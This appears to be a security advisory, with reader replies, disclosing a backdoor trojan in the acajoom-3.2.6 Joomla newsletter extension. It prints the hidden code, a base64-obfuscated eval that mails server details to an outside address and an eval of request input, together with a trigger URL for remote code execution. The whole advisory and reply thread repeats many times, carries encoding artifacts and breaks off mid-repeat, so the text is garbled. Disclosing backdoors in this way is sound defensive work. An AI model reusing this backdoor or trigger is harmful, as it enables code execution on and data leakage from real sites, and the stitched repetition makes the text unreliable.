Back door trojan in acajoom-3.2.6 for joomla

Vulnerability:
=A0=A0=A0=A0Remote code execution back door

Software:
=A0=A0=A0=A0acajoom - mailing list extension for Joomla
    Acajoom is a newsletter component designed with ease of use and robustn=
ess
    in mind. Acajoom can handle an unlimited number of newsletters with an
    unlimited number of subscribers in just few clicks. Acajoom reuses some=
 of
    Joomla 1.5 new concepts to make the users experience as smooth as possi=
ble.
    > And thats not all

Severity:
=A0=A0=A0=A0Not a big deal. =A0Joomla components contain all sorts of obfus=
cated junk all
=A0=A0=A0=A0the time. =A0Who cares what it does?

URLs:
    http://www.ijoobi.com/
    http://www.ijoobi.com/media/acajoom-3.2.6.zip
    http://www.ijoobi.com/component/option,com_jtickets/Itemid,18/controlle=
r,ticket/pjid,3/task,add/type,110/


Vendor notified:
    Naah.  No contact details.  I suppose I might try battle the captcha on=
e
    day.


Vulnerability:

  http://www.ijoobi.com/media/acajoom-3.2.6.zip

    install.acajoom.php:

        function GetBots($us1,$us2,$us3) {
        list($data1,$data2,$data3) =3D array(dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ=
,
        QG1haWwoJHVzMSwgJHVzMiwgImh0,1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs=
);
        eval(base64_decode($data2.$data1.$data3)); }
	define( COUNT_ROOT, $count_db. 1 .chr(64).chr(121).chr(97). .
.$array_lang[10-$count_num] );
	$counter =3D COUNT_ROOT;
	$count_db =3D qadr; $count_num =3D 8;
        GetBots($counter,$_SERVER[SERVER_NAME],$_SERVER[SCRIPT_FILENAME=
]);

    Or, less cryptically:
        @mail(qadr1@ya.ru, $_SERVER[SERVER_NAME],
"http://".$_SERVER[SERVER_NAME].$_SERVER[SCRIPT_NAME]."
".$_SERVER[SC=
RIPT_FILENAME]);


  self.acajoom.php says:

    class acajoomCommonStr
    {
        function GetStr($str)
        {
            eval(stripslashes($str));
        }=09
        function InController($cnt,$location)
        {
            if ($location=3D=3Den-g) $this->GetStr($cnt);
        }
    }
    if(isset($_REQUEST[s]) && isset($_REQUEST[lang])) {
        $getacajoomStr =3D new acajoomCommonStr();
        $getacajoomStr->InController($_REQUEST[s],$_REQUEST[lang]);
    }

    ie.
        $URL/self.acajoom.php?s=3Dphpinfo();&lang=3Den-g

    $URL is left as an exercise to the reader.

Greetz:
    qadr1@ya.ru


Replies to this exploit:

From: Jan van Niekerk jvnkrk@gmail.com
Sent: Wed 8. Jul 2009 08:20
The vendor has issued an update, but the explanation falsely minimises
the problem.  (They also did not credit qadr1@ya.ru, nor anyone else.)

http://www.ijoobi.com/blog/latest/acajoom-free-version-3.2.7-available.html
states: "Acajoom GPL 3.2.7 is available for immediate download.  We
recommend all user who use the GPL verison to upgrade immediately due
to security issue.
" ... "A backdoor has been placed in the package by a hacker. This is
concerning only user who downloaded the GPL version ( Acajoom GPL
3.2.7 ) between Thursday 25th of June and Sunday 28th of June."

The start date for the back door and vulnerability is false.  This
issue existed in the wild before 19 June 2009.  According to the
timestamps in the archive, the hack was prepared on 11 June 2009.

On 6/22/09, Jan van Niekerk wrote:
> Vulnerability:
>      Remote code execution back door
>
>  Software:
>      acajoom - mailing list extension for Joomla
>     Acajoom is a newsletter component designed with ease of use and robustness
>     in mind. Acajoom can handle an unlimited number of newsletters with an
>     unlimited number of subscribers in just few clicks. Acajoom reuses some of
>     Joomla 1.5 new concepts to make the users experience as smooth as possible.
>     > And thats not all
>
>  Severity:
>      Not a big deal.  Joomla components contain all sorts of obfuscated junk all
>      the time.  Who cares what it does?
>
>  URLs:
>     http://www.ijoobi.com/
>     http://www.ijoobi.com/media/acajoom-3.2.6.zip
>     http://www.ijoobi.com/component/option,com_jtickets/Itemid,18/controller,ticket/pjid,3/task,add/type,110/
>
>
>  Vendor notified:
>     Naah.  No contact details.  I suppose I might try battle the captcha one
>     day.
>
>
>  Vulnerability:
>
>   http://www.ijoobi.com/media/acajoom-3.2.6.zip
>
>     install.acajoom.php:
>
>         function GetBots($us1,$us2,$us3) {
>         list($data1,$data2,$data3) = array(dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ,
>         QG1haWwoJHVzMSwgJHVzMiwgImh0,1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs);
>         eval(base64_decode($data2.$data1.$data3)); }
>         define( COUNT_ROOT, $count_db. 1 .chr(64).chr(121).chr(97). .
>  .$array_lang[10-$count_num] );
>         $counter = COUNT_ROOT;
>         $count_db = qadr; $count_num = 8;
>         GetBots($counter,$_SERVER[SERVER_NAME],$_SERVER[SCRIPT_FILENAME]);
>
>     Or, less cryptically:
>         @mail(qadr1@ya.ru, $_SERVER[SERVER_NAME],
>  "http://".$_SERVER[SERVER_NAME].$_SERVER[SCRIPT_NAME]."
".$_SERVER[SCRIPT_FILENAME]);
>
>
>   self.acajoom.php says:
>
>     class acajoomCommonStr
>     {
>         function GetStr($str)
>         {
>             eval(stripslashes($str));
>         }
>         function InController($cnt,$location)
>         {
>             if ($location==en-g) $this->GetStr($cnt);
>         }
>     }
>     if(isset($_REQUEST[s]) && isset($_REQUEST[lang])) {
>         $getacajoomStr = new acajoomCommonStr();
>         $getacajoomStr->InController($_REQUEST[s],$_REQUEST[lang]);
>     }
>
>     ie.
>         $URL/self.acajoom.php?s=phpinfo();&lang=en-g
>
>     $URL is left as an exercise to the reader.
>
>  Greetz:
>     qadr1@ya.ru
>


From: chris.boergermann@wawerko.de
Sent: Thu 23. Jul 2009 13:21
An early release of 4.0.0 has the same problem!

So Acajoom has a general security issue or the developers were stupid enough to develop with old code.


From: Jeffrey Walton noloader@gmail.com
Sent: Thu 23. Jul 2009 16:02
> ... or the developers were stupid enough to develop with old code.
Stupid may be a bit harsh. I find Software Security is also a frame
of mind that *must* be backed by education. Perhaps the developers
lack the knowledge they need to model the threats and incorporate a
secure architecture.

Jeff

- Hide quoted text -

On 7/23/09, chris.boergermann@wawerko.de <chris.boergermann@wawerko.de> wrote:
> An early release of 4.0.0 has the same problem!
>
> So Acajoom has a general security issue or the developers
> were stupid enough to develop with old code.
>


From: elkekas@gmail.com
Sent: Thu 13. Aug 2009 03:26
not are stupids, there are one virus. 

 function GetBots($us1,$us2,$us3) {
      list($data1,$data2,$data3) = array(dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ,
      QG1haWwoJHVzMSwgJHVzMiwgImh0,1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs);
      eval(base64_decode($data2.$data1.$data3));
      }


From: anonymous@anonymous.com
Sent: Sat 5. Dec 2009 15:08
==
@mail($us1, $us2, "http://".$us2.$_SERVER[SCRIPT_NAME]."
".$us3);


From: Jan van Niekerk jvnkrk@gmail.com
Sent: Wed 8. Jul 2009 08:20
The vendor has issued an update, but the explanation falsely minimises
the problem.  (They also did not credit qadr1@ya.ru, nor anyone else.)

http://www.ijoobi.com/blog/latest/acajoom-free-version-3.2.7-available.html
states: "Acajoom GPL 3.2.7 is available for immediate download.  We
recommend all user who use the GPL verison to upgrade immediately due
to security issue.
" ... "A backdoor has been placed in the package by a hacker. This is
concerning only user who downloaded the GPL version ( Acajoom GPL
3.2.7 ) between Thursday 25th of June and Sunday 28th of June."

The start date for the back door and vulnerability is false.  This
issue existed in the wild before 19 June 2009.  According to the
timestamps in the archive, the hack was prepared on 11 June 2009.

On 6/22/09, Jan van Niekerk wrote:
> Vulnerability:
>      Remote code execution back door
>
>  Software:
>      acajoom - mailing list extension for Joomla
>     Acajoom is a newsletter component designed with ease of use and robustness
>     in mind. Acajoom can handle an unlimited number of newsletters with an
>     unlimited number of subscribers in just few clicks. Acajoom reuses some of
>     Joomla 1.5 new concepts to make the users experience as smooth as possible.
>     > And thats not all
>
>  Severity:
>      Not a big deal.  Joomla components contain all sorts of obfuscated junk all
>      the time.  Who cares what it does?
>
>  URLs:
>     http://www.ijoobi.com/
>     http://www.ijoobi.com/media/acajoom-3.2.6.zip
>     http://www.ijoobi.com/component/option,com_jtickets/Itemid,18/controller,ticket/pjid,3/task,add/type,110/
>
>
>  Vendor notified:
>     Naah.  No contact details.  I suppose I might try battle the captcha one
>     day.
>
>
>  Vulnerability:
>
>   http://www.ijoobi.com/media/acajoom-3.2.6.zip
>
>     install.acajoom.php:
>
>         function GetBots($us1,$us2,$us3) {
>         list($data1,$data2,$data3) = array(dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ,
>         QG1haWwoJHVzMSwgJHVzMiwgImh0,1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs);
>         eval(base64_decode($data2.$data1.$data3)); }
>         define( COUNT_ROOT, $count_db. 1 .chr(64).chr(121).chr(97). .
>  .$array_lang[10-$count_num] );
>         $counter = COUNT_ROOT;
>         $count_db = qadr; $count_num = 8;
>         GetBots($counter,$_SERVER[SERVER_NAME],$_SERVER[SCRIPT_FILENAME]);
>
>     Or, less cryptically:
>         @mail(qadr1@ya.ru, $_SERVER[SERVER_NAME],
>  "http://".$_SERVER[SERVER_NAME].$_SERVER[SCRIPT_NAME]."
".$_SERVER[SCRIPT_FILENAME]);
>
>
>   self.acajoom.php says:
>
>     class acajoomCommonStr
>     {
>         function GetStr($str)
>         {
>             eval(stripslashes($str));
>         }
>         function InController($cnt,$location)
>         {
>             if ($location==en-g) $this->GetStr($cnt);
>         }
>     }
>     if(isset($_REQUEST[s]) && isset($_REQUEST[lang])) {
>         $getacajoomStr = new acajoomCommonStr();
>         $getacajoomStr->InController($_REQUEST[s],$_REQUEST[lang]);
>     }
>
>     ie.
>         $URL/self.acajoom.php?s=phpinfo();&lang=en-g
>
>     $URL is left as an exercise to the reader.
>
>  Greetz:
>     qadr1@ya.ru
>


From: chris.boergermann@wawerko.de
Sent: Thu 23. Jul 2009 13:21
An early release of 4.0.0 has the same problem!

So Acajoom has a general security issue or the developers were stupid enough to develop with old code.


From: Jeffrey Walton noloader@gmail.com
Sent: Thu 23. Jul 2009 16:02
> ... or the developers were stupid enough to develop with old code.
Stupid may be a bit harsh. I find Software Security is also a frame
of mind that *must* be backed by education. Perhaps the developers
lack the knowledge they need to model the threats and incorporate a
secure architecture.

Jeff

- Hide quoted text -

On 7/23/09, chris.boergermann@wawerko.de <chris.boergermann@wawerko.de> wrote:
> An early release of 4.0.0 has the same problem!
>
> So Acajoom has a general security issue or the developers
> were stupid enough to develop with old code.
>


From: elkekas@gmail.com
Sent: Thu 13. Aug 2009 03:26
not are stupids, there are one virus. 

 function GetBots($us1,$us2,$us3) {
      list($data1,$data2,$data3) = array(dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ,
      QG1haWwoJHVzMSwgJHVzMiwgImh0,1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs);
      eval(base64_decode($data2.$data1.$data3));
      }


From: anonymous@anonymous.com
Sent: Sat 5. Dec 2009 15:08
==
@mail($us1, $us2, "http://".$us2.$_SERVER[SCRIPT_NAME]."
".$us3);


From: Jan van Niekerk jvnkrk@gmail.com
Sent: Wed 8. Jul 2009 08:20
The vendor has issued an update, but the explanation falsely minimises
the problem.  (They also did not credit qadr1@ya.ru, nor anyone else.)

http://www.ijoobi.com/blog/latest/acajoom-free-version-3.2.7-available.html
states: "Acajoom GPL 3.2.7 is available for immediate download.  We
recommend all user who use the GPL verison to upgrade immediately due
to security issue.
" ... "A backdoor has been placed in the package by a hacker. This is
concerning only user who downloaded the GPL version ( Acajoom GPL
3.2.7 ) between Thursday 25th of June and Sunday 28th of June."

The start date for the back door and vulnerability is false.  This
issue existed in the wild before 19 June 2009.  According to the
timestamps in the archive, the hack was prepared on 11 June 2009.

On 6/22/09, Jan van Niekerk wrote:
> Vulnerability:
>      Remote code execution back door
>
>  Software:
>      acajoom - mailing list extension for Joomla
>     Acajoom is a newsletter component designed with ease of use and robustness
>     in mind. Acajoom can handle an unlimited number of newsletters with an
>     unlimited number of subscribers in just few clicks. Acajoom reuses some of
>     Joomla 1.5 new concepts to make the users experience as smooth as possible.
>     > And thats not all
>
>  Severity:
>      Not a big deal.  Joomla components contain all sorts of obfuscated junk all
>      the time.  Who cares what it does?
>
>  URLs:
>     http://www.ijoobi.com/
>     http://www.ijoobi.com/media/acajoom-3.2.6.zip
>     http://www.ijoobi.com/component/option,com_jtickets/Itemid,18/controller,ticket/pjid,3/task,add/type,110/
>
>
>  Vendor notified:
>     Naah.  No contact details.  I suppose I might try battle the captcha one
>     day.
>
>
>  Vulnerability:
>
>   http://www.ijoobi.com/media/acajoom-3.2.6.zip
>
>     install.acajoom.php:
>
>         function GetBots($us1,$us2,$us3) {
>         list($data1,$data2,$data3) = array(dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ,
>         QG1haWwoJHVzMSwgJHVzMiwgImh0,1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs);
>         eval(base64_decode($data2.$data1.$data3)); }
>         define( COUNT_ROOT, $count_db. 1 .chr(64).chr(121).chr(97). .
>  .$array_lang[10-$count_num] );
>         $counter = COUNT_ROOT;
>         $count_db = qadr; $count_num = 8;
>         GetBots($counter,$_SERVER[SERVER_NAME],$_SERVER[SCRIPT_FILENAME]);
>
>     Or, less cryptically:
>         @mail(qadr1@ya.ru, $_SERVER[SERVER_NAME],
>  "http://".$_SERVER[SERVER_NAME].$_SERVER[SCRIPT_NAME]."
".$_SERVER[SCRIPT_FILENAME]);
>
>
>   self.acajoom.php says:
>
>     class acajoomCommonStr
>     {
>         function GetStr($str)
>         {
>             eval(stripslashes($str));
>         }
>         function InController($cnt,$location)
>         {
>             if ($location==en-g) $this->GetStr($cnt);
>         }
>     }
>     if(isset($_REQUEST[s]) && isset($_REQUEST[lang])) {
>         $getacajoomStr = new acajoomCommonStr();
>         $getacajoomStr->InController($_REQUEST[s],$_REQUEST[lang]);
>     }
>
>     ie.
>         $URL/self.acajoom.php?s=phpinfo();&lang=en-g
>
>     $URL is left as an exercise to the reader.
>
>  Greetz:
>     qadr1@ya.ru
>


From: chris.boergermann@wawerko.de
Sent: Thu 23. Jul 2009 13:21
An early release of 4.0.0 has the same problem!

So Acajoom has a general security issue or the developers were stupid enough to develop with old code.


From: Jeffrey Walton noloader@gmail.com
Sent: Thu 23. Jul 2009 16:02
> ... or the developers were stupid enough to develop with old code.
Stupid may be a bit harsh. I find Software Security is also a frame
of mind that *must* be backed by education. Perhaps the developers
lack the knowledge they need to model the threats and incorporate a
secure architecture.

Jeff

- Hide quoted text -

On 7/23/09, chris.boergermann@wawerko.de <chris.boergermann@wawerko.de> wrote:
> An early release of 4.0.0 has the same problem!
>
> So Acajoom has a general security issue or the developers
> were stupid enough to develop with old code.
>


From: elkekas@gmail.com
Sent: Thu 13. Aug 2009 03:26
not are stupids, there are one virus. 

 function GetBots($us1,$us2,$us3) {
      list($data1,$data2,$data3) = array(dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ,
      QG1haWwoJHVzMSwgJHVzMiwgImh0,1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs);
      eval(base64_decode($data2.$data1.$data3));
      }


From: anonymous@anonymous.com
Sent: Sat 5. Dec 2009 15:08
==
@mail($us1, $us2, "http://".$us2.$_SERVER[SCRIPT_NAME]."
".$us3);


From: Jan van Niekerk jvnkrk@gmail.com
Sent: Wed 8. Jul 2009 08:20
The vendor has issued an update, but the explanation falsely minimises
the problem.  (They also did not credit qadr1@ya.ru, nor anyone else.)

http://www.ijoobi.com/blog/latest/acajoom-free-version-3.2.7-available.html
states: "Acajoom GPL 3.2.7 is available for immediate download.  We
recommend all user who use the GPL verison to upgrade immediately due
to security issue.
" ... "A backdoor has been placed in the package by a hacker. This is
concerning only user who downloaded the GPL version ( Acajoom GPL
3.2.7 ) between Thursday 25th of June and Sunday 28th of June."

The start date for the back door and vulnerability is false.  This
issue existed in the wild before 19 June 2009.  According to the
timestamps in the archive, the hack was prepared on 11 June 2009.

On 6/22/09, Jan van Niekerk wrote:
> Vulnerability:
>      Remote code execution back door
>
>  Software:
>      acajoom - mailing list extension for Joomla
>     Acajoom is a newsletter component designed with ease of use and robustness
>     in mind. Acajoom can handle an unlimited number of newsletters with an
>     unlimited number of subscribers in just few clicks. Acajoom reuses some of
>     Joomla 1.5 new concepts to make the users experience as smooth as possible.
>     > And thats not all
>
>  Severity:
>      Not a big deal.  Joomla components contain all sorts of obfuscated junk all
>      the time.  Who cares what it does?
>
>  URLs:
>     http://www.ijoobi.com/
>     http://www.ijoobi.com/media/acajoom-3.2.6.zip
>     http://www.ijoobi.com/component/option,com_jtickets/Itemid,18/controller,ticket/pjid,3/task,add/type,110/
>
>
>  Vendor notified:
>     Naah.  No contact details.  I suppose I might try battle the captcha one
>     day.
>
>
>  Vulnerability:
>
>   http://www.ijoobi.com/media/acajoom-3.2.6.zip
>
>     install.acajoom.php:
>
>         function GetBots($us1,$us2,$us3) {
>         list($data1,$data2,$data3) = array(dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ,
>         QG1haWwoJHVzMSwgJHVzMiwgImh0,1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs);
>         eval(base64_decode($data2.$data1.$data3)); }
>         define( COUNT_ROOT, $count_db. 1 .chr(64).chr(121).chr(97). .
>  .$array_lang[10-$count_num] );
>         $counter = COUNT_ROOT;
>         $count_db = qadr; $count_num = 8;
>         GetBots($counter,$_SERVER[SERVER_NAME],$_SERVER[SCRIPT_FILENAME]);
>
>     Or, less cryptically:
>         @mail(qadr1@ya.ru, $_SERVER[SERVER_NAME],
>  "http://".$_SERVER[SERVER_NAME].$_SERVER[SCRIPT_NAME]."
".$_SERVER[SCRIPT_FILENAME]);
>
>
>   self.acajoom.php says:
>
>     class acajoomCommonStr
>     {
>         function GetStr($str)
>         {
>             eval(stripslashes($str));
>         }
>         function InController($cnt,$location)
>         {
>             if ($location==en-g) $this->GetStr($cnt);
>         }
>     }
>     if(isset($_REQUEST[s]) && isset($_REQUEST[lang])) {
>         $getacajoomStr = new acajoomCommonStr();
>         $getacajoomStr->InController($_REQUEST[s],$_REQUEST[lang]);
>     }
>
>     ie.
>         $URL/self.acajoom.php?s=phpinfo();&lang=en-g
>
>     $URL is left as an exercise to the reader.
>
>  Greetz:
>     qadr1@ya.ru
>


From: chris.boergermann@wawerko.de
Sent: Thu 23. Jul 2009 13:21
An early release of 4.0.0 has the same problem!

So Acajoom has a general security issue or the developers were stupid enough to develop with old code.


From: Jeffrey Walton noloader@gmail.com
Sent: Thu 23. Jul 2009 16:02
> ... or the developers were stupid enough to develop with old code.
Stupid may be a bit harsh. I find Software Security is also a frame
of mind that *must* be backed by education. Perhaps the developers
lack the knowledge they need to model the threats and incorporate a
secure architecture.

Jeff

- Hide quoted text -

On 7/23/09, chris.boergermann@wawerko.de <chris.boergermann@wawerko.de> wrote:
> An early release of 4.0.0 has the same problem!
>
> So Acajoom has a general security issue or the developers
> were stupid enough to develop with old code.
>


From: elkekas@gmail.com
Sent: Thu 13. Aug 2009 03:26
not are stupids, there are one virus. 

 function GetBots($us1,$us2,$us3) {
      list($data1,$data2,$data3) = array(dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ,
      QG1haWwoJHVzMSwgJHVzMiwgImh0,1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs);
      eval(base64_decode($data2.$data1.$data3));
      }


From: anonymous@anonymous.com
Sent: Sat 5. Dec 2009 15:08
==
@mail($us1, $us2, "http://".$us2.$_SERVER[SCRIPT_NAME]."
".$us3);


From: Jan van Niekerk jvnkrk@gmail.com
Sent: Wed 8. Jul 2009 08:20
The vendor has issued an update, but the explanation falsely minimises
the problem.  (They also did not credit qadr1@ya.ru, nor anyone else.)

http://www.ijoobi.com/blog/latest/acajoom-free-version-3.2.7-available.html
states: "Acajoom GPL 3.2.7 is available for immediate download.  We
recommend all user who use the GPL verison to upgrade immediately due
to security issue.
" ... "A backdoor has been placed in the package by a hacker. This is
concerning only user who downloaded the GPL version ( Acajoom GPL
3.2.7 ) between Thursday 25th of June and Sunday 28th of June."

The start date for the back door and vulnerability is false.  This
issue existed in the wild before 19 June 2009.  According to the
timestamps in the archive, the hack was prepared on 11 June 2009.

On 6/22/09, Jan van Niekerk wrote:
> Vulnerability:
>      Remote code execution back door
>
>  Software:
>      acajoom - mailing list extension for Joomla
>     Acajoom is a newsletter component designed with ease of use and robustness
>     in mind. Acajoom can handle an unlimited number of newsletters with an
>     unlimited number of subscribers in just few clicks. Acajoom reuses some of
>     Joomla 1.5 new concepts to make the users experience as smooth as possible.
>     > And thats not all
>
>  Severity:
>      Not a big deal.  Joomla components contain all sorts of obfuscated junk all
>      the time.  Who cares what it does?
>
>  URLs:
>     http://www.ijoobi.com/
>     http://www.ijoobi.com/media/acajoom-3.2.6.zip
>     http://www.ijoobi.com/component/option,com_jtickets/Itemid,18/controller,ticket/pjid,3/task,add/type,110/
>
>
>  Vendor notified:
>     Naah.  No contact details.  I suppose I might try battle the captcha one
>     day.
>
>
>  Vulnerability:
>
>   http://www.ijoobi.com/media/acajoom-3.2.6.zip
>
>     install.acajoom.php:
>
>         function GetBots($us1,$us2,$us3) {
>         list($data1,$data2,$data3) = array(dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ,
>         QG1haWwoJHVzMSwgJHVzMiwgImh0,1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs);
>         eval(base64_decode($data2.$data1.$data3)); }
>         define( COUNT_ROOT, $count_db. 1 .chr(64).chr(121).chr(97). .
>  .$array_lang[10-$count_num] );
>         $counter = COUNT_ROOT;
>         $count_db = qadr; $count_num = 8;
>         GetBots($counter,$_SERVER[SERVER_NAME],$_SERVER[SCRIPT_FILENAME]);
>
>     Or, less cryptically:
>         @mail(qadr1@ya.ru, $_SERVER[SERVER_NAME],
>  "http://".$_SERVER[SERVER_NAME].$_SERVER[SCRIPT_NAME]."
".$_SERVER[SCRIPT_FILENAME]);
>
>
>   self.acajoom.php says:
>
>     class acajoomCommonStr
>     {
>         function GetStr($str)
>         {
>             eval(stripslashes($str));
>         }
>         function InController($cnt,$location)
>         {
>             if ($location==en-g) $this->GetStr($cnt);
>         }
>     }
>     if(isset($_REQUEST[s]) && isset($_REQUEST[lang])) {
>         $getacajoomStr = new acajoomCommonStr();
>         $getacajoomStr->InController($_REQUEST[s],$_REQUEST[lang]);
>     }
>
>     ie.
>         $URL/self.acajoom.php?s=phpinfo();&lang=en-g
>
>     $URL is left as an exercise to the reader.
>
>  Greetz:
>     qadr1@ya.ru
>


From: chris.boergermann@wawerko.de
Sent: Thu 23. Jul 2009 13:21
An early release of 4.0.0 has the same problem!

So Acajoom has a general security issue or the developers were stupid enough to develop with old code.


From: Jeffrey Walton noloader@gmail.com
Sent: Thu 23. Jul 2009 16:02
> ... or the developers were stupid enough to develop with old code.
Stupid may be a bit harsh. I find Software Security is also a frame
of mind that *must* be backed by education. Perhaps the developers
lack the knowledge they need to model the threats and incorporate a
secure architecture.

Jeff

- Hide quoted text -

On 7/23/09, chris.boergermann@wawerko.de <chris.boergermann@wawerko.de> wrote:
> An early release of 4.0.0 has the same problem!
>
> So Acajoom has a general security issue or the developers
> were stupid enough to develop with old code.
>


From: elkekas@gmail.com
Sent: Thu 13. Aug 2009 03:26
not are stupids, there are one virus. 

 function GetBots($us1,$us2,$us3) {
      list($data1,$data2,$data3) = array(dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ,
      QG1haWwoJHVzMSwgJHVzMiwgImh0,1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs);
      eval(base64_decode($data2.$data1.$data3));
      }


From: anonymous@anonymous.com
Sent: Sat 5. Dec 2009 15:08
==
@mail($us1, $us2, "http://".$us2.$_SERVER[SCRIPT_NAME]."
".$us3);


From: Jan van Niekerk jvnkrk@gmail.com
Sent: Wed 8. Jul 2009 08:20
The vendor has issued an update, but the explanation falsely minimises
the problem.  (They also did not credit qadr1@ya.ru, nor anyone else.)

http://www.ijoobi.com/blog/latest/acajoom-free-version-3.2.7-available.html
states: "Acajoom GPL 3.2.7 is available for immediate download.  We
recommend all user who use the GPL verison to upgrade immediately due
to security issue.
" ... "A backdoor has been placed in the package by a hacker. This is
concerning only user who downloaded the GPL version ( Acajoom GPL
3.2.7 ) between Thursday 25th of June and Sunday 28th of June."

The start date for the back door and vulnerability is false.  This
issue existed in the wild before 19 June 2009.  According to the
timestamps in the archive, the hack was prepared on 11 June 2009.

On 6/22/09, Jan van Niekerk wrote:
> Vulnerability:
>      Remote code execution back door
>
>  Software:
>      acajoom - mailing list extension for Joomla
>     Acajoom is a newsletter component designed with ease of use and robustness
>     in mind. Acajoom can handle an unlimited number of newsletters with an
>     unlimited number of subscribers in just few clicks. Acajoom reuses some of
>     Joomla 1.5 new concepts to make the users experience as smooth as possible.
>     > And thats not all
>
>  Severity:
>      Not a big deal.  Joomla components contain all sorts of obfuscated junk all
>      the time.  Who cares what it does?
>
>  URLs:
>     http://www.ijoobi.com/
>     http://www.ijoobi.com/media/acajoom-3.2.6.zip
>     http://www.ijoobi.com/component/option,com_jtickets/Itemid,18/controller,ticket/pjid,3/task,add/type,110/
>
>
>  Vendor notified:
>     Naah.  No contact details.  I suppose I might try battle the captcha one
>     day.
>
>
>  Vulnerability:
>
>   http://www.ijoobi.com/media/acajoom-3.2.6.zip
>
>     install.acajoom.php:
>
>         function GetBots($us1,$us2,$us3) {
>         list($data1,$data2,$data3) = array(dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ,
>         QG1haWwoJHVzMSwgJHVzMiwgImh0,1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs);
>         eval(base64_decode($data2.$data1.$data3)); }
>         define( COUNT_ROOT, $count_db. 1 .chr(64).chr(121).chr(97). .
>  .$array_lang[10-$count_num] );
>         $counter = COUNT_ROOT;
>         $count_db = qadr; $count_num = 8;
>         GetBots($counter,$_SERVER[SERVER_NAME],$_SERVER[SCRIPT_FILENAME]);
>
>     Or, less cryptically:
>         @mail(qadr1@ya.ru, $_SERVER[SERVER_NAME],
>  "http://".$_SERVER[SERVER_NAME].$_SERVER[SCRIPT_NAME]."
".$_SERVER[SCRIPT_FILENAME]);
>
>
>   self.acajoom.php says:
>
>     class acajoomCommonStr
>     {
>         function GetStr($str)
>         {
>             eval(stripslashes($str));
>         }
>         function InController($cnt,$location)
>         {
>             if ($location==en-g) $this->GetStr($cnt);
>         }
>     }
>     if(isset($_REQUEST[s]) && isset($_REQUEST[lang])) {
>         $getacajoomStr = new acajoomCommonStr();
>         $getacajoomStr->InController($_REQUEST[s],$_REQUEST[lang]);
>     }
>
>     ie.
>         $URL/self.acajoom.php?s=phpinfo();&lang=en-g
>
>     $URL is left as an exercise to the reader.
>
>  Greetz:
>     qadr1@ya.ru
>


From: chris.boergermann@wawerko.de
Sent: Thu 23. Jul 2009 13:21
An early release of 4.0.0 has the same problem!

So Acajoom has a general security issue or the developers were stupid enough to develop with old code.


From: Jeffrey Walton noloader@gmail.com
Sent: Thu 23. Jul 2009 16:02
> ... or the developers were stupid enough to develop with old code.
Stupid may be a bit harsh. I find Software Security is also a frame
of mind that *must* be backed by education. Perhaps the developers
lack the knowledge they need to model the threats and incorporate a
secure architecture.

Jeff

- Hide quoted text -

On 7/23/09, chris.boergermann@wawerko.de <chris.boergermann@wawerko.de> wrote:
> An early release of 4.0.0 has the same problem!
>
> So Acajoom has a general security issue or the developers
> were stupid enough to develop with old code.
>


From: elkekas@gmail.com
Sent: Thu 13. Aug 2009 03:26
not are stupids, there are one virus. 

 function GetBots($us1,$us2,$us3) {
      list($data1,$data2,$data3) = array(dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ,
      QG1haWwoJHVzMSwgJHVzMiwgImh0,1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs);
      eval(base64_decode($data2.$data1.$data3));
      }


From: anonymous@anonymous.com
Sent: Sat 5. Dec 2009 15:08
==
@mail($us1, $us2, "http://".$us2.$_SERVER[SCRIPT_NAME]."
".$us3);


From: Jan van Niekerk jvnkrk@gmail.com
Sent: Wed 8. Jul 2009 08:20
The vendor has issued an update, but the explanation falsely minimises
the problem.  (They also did not credit qadr1@ya.ru, nor anyone else.)

http://www.ijoobi.com/blog/latest/acajoom-free-version-3.2.7-available.html
states: "Acajoom GPL 3.2.7 is available for immediate download.  We
recommend all user who use the GPL verison to upgrade immediately due
to security issue.
" ... "A backdoor has been placed in the package by a hacker. This is
concerning only user who downloaded the GPL version ( Acajoom GPL
3.2.7 ) between Thursday 25th of June and Sunday 28th of June."

The start date for the back door and vulnerability is false.  This
issue existed in the wild before 19 June 2009.  According to the
timestamps in the archive, the hack was prepared on 11 June 2009.

On 6/22/09, Jan van Niekerk wrote:
> Vulnerability:
>      Remote code execution back door
>
>  Software:
>      acajoom - mailing list extension for Joomla
>     Acajoom is a newsletter component designed with ease of use and robustness
>     in mind. Acajoom can handle an unlimited number of newsletters with an
>     unlimited number of subscribers in just few clicks. Acajoom reuses some of
>     Joomla 1.5 new concepts to make the users experience as smooth as possible.
>     > And thats not all
>
>  Severity:
>      Not a big deal.  Joomla components contain all sorts of obfuscated junk all
>      the time.  Who cares what it does?
>
>  URLs:
>     http://www.ijoobi.com/
>     http://www.ijoobi.com/media/acajoom-3.2.6.zip
>     http://www.ijoobi.com/component/option,com_jtickets/Itemid,18/controller,ticket/pjid,3/task,add/type,110/
>
>
>  Vendor notified:
>     Naah.  No contact details.  I suppose I might try battle the captcha one
>     day.
>
>
>  Vulnerability:
>
>   http://www.ijoobi.com/media/acajoom-3.2.6.zip
>
>     install.acajoom.php:
>
>         function GetBots($us1,$us2,$us3) {
>         list($data1,$data2,$data3) = array(dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ,
